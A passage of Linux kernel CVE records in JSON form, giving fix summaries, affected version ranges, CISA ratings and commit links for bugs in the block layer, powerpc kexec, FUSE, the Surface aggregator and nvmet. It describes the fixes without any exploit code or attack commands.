"assignerShortName": "Linux",
"cveId": "CVE-2024-43816",
"datePublished": "2024-08-17T09:21:38.926Z",
"dateReserved": "2024-08-17T09:11:59.270Z",
"dateUpdated": "2025-05-04T09:26:54.218Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52458 (GCVE-0-2023-52458)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
block: add check that partition length needs to be aligned with block size
Before calling add partition or resize partition, there is no check
on whether the length is aligned with the logical block size.
If the logical block size of the disk is larger than 512 bytes,
then the partition size maybe not the multiple of the logical block size,
and when the last sector is read, bio_truncate() will adjust the bio size,
resulting in an IO error if the size of the read command is smaller than
the logical block size.If integrity data is supported, this will also
result in a null pointer dereference when calling bio_integrity_free.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52458",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-26T17:05:34.872000Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:59.886Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.831Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5010c27120962c85d2f421d2cf211791c9603503"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef31cc87794731ffcb578a195a2c47d744e25fb8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f64f866aa1ae6975c95d805ed51d7e9433a0016"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5010c27120962c85d2f421d2cf211791c9603503",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ef31cc87794731ffcb578a195a2c47d744e25fb8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6f64f866aa1ae6975c95d805ed51d7e9433a0016",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: add check that partition length needs to be aligned with block size\n\nBefore calling add partition or resize partition, there is no check\non whether the length is aligned with the logical block size.\nIf the logical block size of the disk is larger than 512 bytes,\nthen the partition size maybe not the multiple of the logical block size,\nand when the last sector is read, bio_truncate() will adjust the bio size,\nresulting in an IO error if the size of the read command is smaller than\nthe logical block size.If integrity data is supported, this will also\nresult in a null pointer dereference when calling bio_integrity_free."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:03.432Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62"
},
{
"url": "https://git.kernel.org/stable/c/5010c27120962c85d2f421d2cf211791c9603503"
},
{
"url": "https://git.kernel.org/stable/c/ef31cc87794731ffcb578a195a2c47d744e25fb8"
},
{
"url": "https://git.kernel.org/stable/c/cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8"
},
{
"url": "https://git.kernel.org/stable/c/bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5"
},
{
"url": "https://git.kernel.org/stable/c/6f64f866aa1ae6975c95d805ed51d7e9433a0016"
}
],
"title": "block: add check that partition length needs to be aligned with block size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52458",
"datePublished": "2024-02-23T14:46:20.397Z",
"dateReserved": "2024-02-20T12:30:33.294Z",
"dateUpdated": "2025-05-04T07:37:03.432Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42230 (GCVE-0-2024-42230)
Vulnerability from cvelistv5
Published
2024-07-30 07:47
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/pseries: Fix scv instruction crash with kexec
kexec on pseries disables AIL (reloc_on_exc), required for scv
instruction support, before other CPUs have been shut down. This means
they can execute scv instructions after AIL is disabled, which causes an
interrupt at an unexpected entry location that crashes the kernel.
Change the kexec sequence to disable AIL after other CPUs have been
brought down.
As a refresher, the real-mode scv interrupt vector is 0x17000, and the
fixed-location head code probably couldn't easily deal with implementing
such high addresses so it was just decided not to support that interrupt
at all.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.571Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c550679d604798d9fed8a5b2bb5693448a25407c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d10e3c39001e9194b9a1bfd6979bd3fa19dccdc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c6506616386ce37e59b2745fc481c6713fae4f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21a741eb75f80397e5f7d3739e24d7d75e619011"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42230",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:24.948809Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:32.851Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/kexec/core_64.c",
"arch/powerpc/platforms/pseries/kexec.c",
"arch/powerpc/platforms/pseries/pseries.h",
"arch/powerpc/platforms/pseries/setup.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c550679d604798d9fed8a5b2bb5693448a25407c",
"status": "affected",
"version": "7fa95f9adaee7e5cbb195d3359741120829e488b",
"versionType": "git"
},
{
"lessThan": "d10e3c39001e9194b9a1bfd6979bd3fa19dccdc5",
"status": "affected",
"version": "7fa95f9adaee7e5cbb195d3359741120829e488b",
"versionType": "git"
},
{
"lessThan": "8c6506616386ce37e59b2745fc481c6713fae4f3",
"status": "affected",
"version": "7fa95f9adaee7e5cbb195d3359741120829e488b",
"versionType": "git"
},
{
"lessThan": "21a741eb75f80397e5f7d3739e24d7d75e619011",
"status": "affected",
"version": "7fa95f9adaee7e5cbb195d3359741120829e488b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/kexec/core_64.c",
"arch/powerpc/platforms/pseries/kexec.c",
"arch/powerpc/platforms/pseries/pseries.h",
"arch/powerpc/platforms/pseries/setup.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: Fix scv instruction crash with kexec\n\nkexec on pseries disables AIL (reloc_on_exc), required for scv\ninstruction support, before other CPUs have been shut down. This means\nthey can execute scv instructions after AIL is disabled, which causes an\ninterrupt at an unexpected entry location that crashes the kernel.\n\nChange the kexec sequence to disable AIL after other CPUs have been\nbrought down.\n\nAs a refresher, the real-mode scv interrupt vector is 0x17000, and the\nfixed-location head code probably couldn\u0027t easily deal with implementing\nsuch high addresses so it was just decided not to support that interrupt\nat all."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:38.574Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c550679d604798d9fed8a5b2bb5693448a25407c"
},
{
"url": "https://git.kernel.org/stable/c/d10e3c39001e9194b9a1bfd6979bd3fa19dccdc5"
},
{
"url": "https://git.kernel.org/stable/c/8c6506616386ce37e59b2745fc481c6713fae4f3"
},
{
"url": "https://git.kernel.org/stable/c/21a741eb75f80397e5f7d3739e24d7d75e619011"
}
],
"title": "powerpc/pseries: Fix scv instruction crash with kexec",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42230",
"datePublished": "2024-07-30T07:47:10.703Z",
"dateReserved": "2024-07-30T07:40:12.250Z",
"dateUpdated": "2025-05-04T09:24:38.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-44947 (GCVE-0-2024-44947)
Vulnerability from cvelistv5
Published
2024-09-02 17:36
Modified
2025-05-04 09:29
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: Initialize beyond-EOF page contents before setting uptodate
fuse_notify_store(), unlike fuse_do_readpage(), does not enable page
zeroing (because it can be used to change partial page contents).
So fuse_notify_store() must be more careful to fully initialize page
contents (including parts of the page that are beyond end-of-file)
before marking the page uptodate.
The current code can leave beyond-EOF page contents uninitialized, which
makes these uninitialized page contents visible to userspace via mmap().
This is an information leak, but only affects systems which do not
enable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the
corresponding kernel command line parameter).
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 Version: a1d75f258230b75d46aecdf28b2e732413028863 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-44947",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:27:03.431067Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:15.852Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "49934861514d36d0995be8e81bb3312a499d8d9a",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "33168db352c7b56ae18aa55c2cae1a1c5905d30e",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "4690e2171f651e2b415e3941ce17f2f7b813aff6",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "8c78303eafbf85a728dd84d1750e89240c677dd9",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "831433527773e665bdb635ab5783d0b95d1246f4",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "ac42e0f0eb66af966015ee33fd355bc6f5d80cd6",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "18a067240817bee8a9360539af5d79a4bf5398a5",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
},
{
"lessThan": "3c0da3d163eb32f1f91891efaade027fa9b245b9",
"status": "affected",
"version": "a1d75f258230b75d46aecdf28b2e732413028863",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.36"
},
{
"lessThan": "2.6.36",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.321",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.283",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.225",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.166",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.107",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.48",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.321",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.283",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.225",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.166",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.107",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.48",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.7",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: Initialize beyond-EOF page contents before setting uptodate\n\nfuse_notify_store(), unlike fuse_do_readpage(), does not enable page\nzeroing (because it can be used to change partial page contents).\n\nSo fuse_notify_store() must be more careful to fully initialize page\ncontents (including parts of the page that are beyond end-of-file)\nbefore marking the page uptodate.\n\nThe current code can leave beyond-EOF page contents uninitialized, which\nmakes these uninitialized page contents visible to userspace via mmap().\n\nThis is an information leak, but only affects systems which do not\nenable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the\ncorresponding kernel command line parameter)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:29:35.643Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/49934861514d36d0995be8e81bb3312a499d8d9a"
},
{
"url": "https://git.kernel.org/stable/c/33168db352c7b56ae18aa55c2cae1a1c5905d30e"
},
{
"url": "https://git.kernel.org/stable/c/4690e2171f651e2b415e3941ce17f2f7b813aff6"
},
{
"url": "https://git.kernel.org/stable/c/8c78303eafbf85a728dd84d1750e89240c677dd9"
},
{
"url": "https://git.kernel.org/stable/c/831433527773e665bdb635ab5783d0b95d1246f4"
},
{
"url": "https://git.kernel.org/stable/c/ac42e0f0eb66af966015ee33fd355bc6f5d80cd6"
},
{
"url": "https://git.kernel.org/stable/c/18a067240817bee8a9360539af5d79a4bf5398a5"
},
{
"url": "https://git.kernel.org/stable/c/3c0da3d163eb32f1f91891efaade027fa9b245b9"
},
{
"url": "https://project-zero.issues.chromium.org/issues/42451729"
}
],
"title": "fuse: Initialize beyond-EOF page contents before setting uptodate",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-44947",
"datePublished": "2024-09-02T17:36:15.633Z",
"dateReserved": "2024-08-21T05:34:56.665Z",
"dateUpdated": "2025-05-04T09:29:35.643Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48880 (GCVE-0-2022-48880)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
platform/surface: aggregator: Add missing call to ssam_request_sync_free()
Although rare, ssam_request_sync_init() can fail. In that case, the
request should be freed via ssam_request_sync_free(). Currently it is
leaked instead. Fix this.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48880",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:59.583081Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:52.962Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/platform/surface/aggregator/controller.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d2dc110deabe7142b60ebeed689e67f92795ee24",
"status": "affected",
"version": "c167b9c7e3d6131b4a4865c112a3dbc86d2e997d",
"versionType": "git"
},
{
"lessThan": "50b3cdf8239b11545f311c4f7b89e0092e4feedb",
"status": "affected",
"version": "c167b9c7e3d6131b4a4865c112a3dbc86d2e997d",
"versionType": "git"
},
{
"lessThan": "c965daac370f08a9b71d573a71d13cda76f2a884",
"status": "affected",
"version": "c167b9c7e3d6131b4a4865c112a3dbc86d2e997d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/platform/surface/aggregator/controller.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/surface: aggregator: Add missing call to ssam_request_sync_free()\n\nAlthough rare, ssam_request_sync_init() can fail. In that case, the\nrequest should be freed via ssam_request_sync_free(). Currently it is\nleaked instead. Fix this."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:22.727Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d2dc110deabe7142b60ebeed689e67f92795ee24"
},
{
"url": "https://git.kernel.org/stable/c/50b3cdf8239b11545f311c4f7b89e0092e4feedb"
},
{
"url": "https://git.kernel.org/stable/c/c965daac370f08a9b71d573a71d13cda76f2a884"
}
],
"title": "platform/surface: aggregator: Add missing call to ssam_request_sync_free()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48880",
"datePublished": "2024-08-21T06:10:11.524Z",
"dateReserved": "2024-07-16T11:38:08.923Z",
"dateUpdated": "2025-05-04T08:25:22.727Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41079 (GCVE-0-2024-41079)
Vulnerability from cvelistv5
Published
2024-07-29 15:04
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvmet: always initialize cqe.result
The spec doesn't mandate that the first two double words (aka results)
for the command queue entry need to be set to 0 when they are not
used (not specified). Though, the target implemention returns 0 for TCP
and FC but not for RDMA.
Let's make RDMA behave the same and thus explicitly initializing the
result field. This prevents leaking any data from the stack.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:51.164Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/30d35b24b7957922f81cfdaa66f2e1b1e9b9aed2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10967873b80742261527a071954be8b54f0f8e4d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0990e8a863645496b9e3f91cfcfd63cd95c80319"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd0c1b8e045a8d2785342b385cb2684d9b48e426"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41079",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:21:11.653239Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:59.600Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
